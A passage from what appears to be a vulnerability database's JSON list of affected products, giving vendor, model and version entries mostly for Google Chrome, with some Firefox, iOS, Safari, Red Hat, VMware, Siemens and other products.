"33.0.1750.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1076.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.72" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "14.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.458.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.208" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1682.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.959.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.149.27" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.624.0" }, { "model": "fusion", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "8.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.156" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.639.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.26" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.0.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "42.0.2311.135" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1293.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.4" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1654.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.25" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.698.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1079.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.338" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.598.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1287.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.30" }, { "model": "simatic ipc377e", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.894.0" }, { "model": "workstation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "12.5.3" }, { "model": "virtualization host", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1061" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.906.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.737.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1284.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.237" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.445.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.214" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.514.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1444.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1672.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.53" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.275.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "13.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.52" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.827.10" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "53.0.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.320" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "58.0.3029.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.311" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.693.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.736.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1069.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1019.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.606.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.438.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.62" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.11" }, { "model": "kernel", "scope": "eq", "trust": 0.3, "vendor": "linux", "version": "4.14.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.209" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.113" }, { "model": "sql server for x64-based systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "201610" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1299.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.226" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.869.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.738.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "27.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.7" }, { "model": "fx -8320 eight-core processor", "scope": "eq", "trust": 0.3, "vendor": "amd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.102" }, { "model": "macos supplemental", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "10.13.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.231" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.32" }, { "model": "enterprise linux eus compute node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.18" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.54" }, { "model": "sql server for x64-based systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "20160" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.578.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.958.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.380.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.21" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.1.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.25" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.0.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.28" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.809.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.50" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1681.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.361.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1018" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.701.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.54" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.780.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.605.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1051.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.51" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.49" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.663.0" }, { "model": "pyxis ciisafe -workstation", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.537.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1275.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.133" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1046.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.122" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1062" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.934.0" }, { "model": "simatic hmi basic panels 2nd generation", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.490.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1020" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.469.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1080.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.67" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.951.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.130" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.414.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.52" }, { "model": "unified computing system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.332" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "1.2.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.108" }, { "model": "simatic field pg m4", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.18" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.688.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1050.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.479.0" }, { "model": "pyxis parx handheld", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.960.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "8.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.838.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.394.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.41" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.718.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.503.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.890.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1057.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "41.0.2272.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.528.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.30" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "12.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.25" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1676.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.2491064" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1023.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.325.0" }, { "model": "safari", "scope": 